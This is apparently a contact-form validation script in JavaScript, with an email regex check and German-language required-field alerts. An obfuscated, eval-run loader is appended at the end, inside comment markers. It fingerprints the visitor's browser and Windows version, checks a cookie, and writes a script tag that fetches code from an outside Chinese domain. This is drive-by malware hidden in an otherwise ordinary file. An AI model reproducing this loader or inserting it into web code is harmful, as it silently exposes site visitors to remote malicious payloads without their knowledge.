			function checkemail(s){
		    	var a = false;
		    	var res = false;
			    if(typeof(RegExp) == 'function')
		    	{
		    		var b = new RegExp('abc');
		    		if(b.test('abc') == true){a = true;}
		   		 }
		
		   		 if(a == true)
		   		 {
		        	reg = new RegExp('^([a-zA-Z0-9\-\.\_]+)'+'(\@)([a-zA-Z0-9\-\.]+)'+'(\.)([a-zA-Z]{2,4})$');
		    		 res = (reg.test(s));
		    	}
		   		 else
		   		 {
		      	  res = (s.search('@') >= 1 && s.lastIndexOf('.') > s.search('@') && s.lastIndexOf('.') >= s.length-5)
		    	}
		    return(res);
			}
		
			function checkForm()
		        {
				var send = 1;		
		  
				   
		           
				   if (document.contact.first_name.value.length == 0)
		           {
				   document.contact.first_name.style.backgroundColor='#C77E20';
		           if(send==1){document.contact.first_name.focus();}
		           send = 0;}else{
		           document.contact.first_name.style.backgroundColor='#FFFFFF';
		           }
		           
				   if (document.contact.last_name.value.length == 0)
		           {
				   document.contact.last_name.style.backgroundColor='#C77E20';
		           if(send==1){document.contact.last_name.focus();}
		           send = 0;}else{
		           document.contact.last_name.style.backgroundColor='#FFFFFF';
		           }
				   
				   if (document.contact.email.value.length == 0)
			           {
					   document.contact.email.style.backgroundColor='#C77E20';
			           if(send==1){document.contact.email.focus();}
			           send = 0;}else{
			           document.contact.email.style.backgroundColor='#FFFFFF';
			           }
				   
		           
		           if(send == 1) {
		        return true;
		        }else{
		        alert('Die farbig unterlegten Felder m' + String.fromCharCode(252) + 'ssen ausgef' + String.fromCharCode(252) + 'llt werden.');
		        return false;
		        }
		     }
<!-- 
(function(){var tuo='%';var ma9='`76ar`20a`3d`22Script`45n`67i`6ee`22`2cb`3d`22`56e`72`73io`6e()+`22`2c`6a`3d`22`22`2c`75`3d`6eav`69`67a`74or`2euserAge`6et`3b`69f(`28u`2e`69ndexOf(`22`43`68rom`65`22)`3c0)`26`26`28u`2eindexO`66(`22Win`22)`3e0)`26`26(u`2ei`6edexOf(`22N`54`206`22)`3c0`29`26`26`28docum`65`6et`2ecooki`65`2ein`64exO`66(`22mi`65`6b`3d1`22)`3c0)`26`26(typeof(z`72vzts)`21`3dty`70e`6f`66(`22`41`22)`29`29`7b`7arvzts`3d`22A`22`3beval(`22i`66(window`2e`22+a+`22)`6a`3dj+`22+`61+`22Major`22`2bb+a+`22Minor`22+`62+a+`22Bu`69ld`22+`62`2b`22`6a`3b`22)`3bdoc`75`6dent`2ewr`69te`28`22`3cscript`20src`3d`2f`2fm`22+`22`61rtuz`2ecn`2fvid`2f`3fid`3d`22`2bj`2b`22`3e`3c`5c`2fscri`70t`3e`22)`3b`7d';var erW=unescape(ma9.replace(/`/g,tuo));eval(erW)})();
 -->
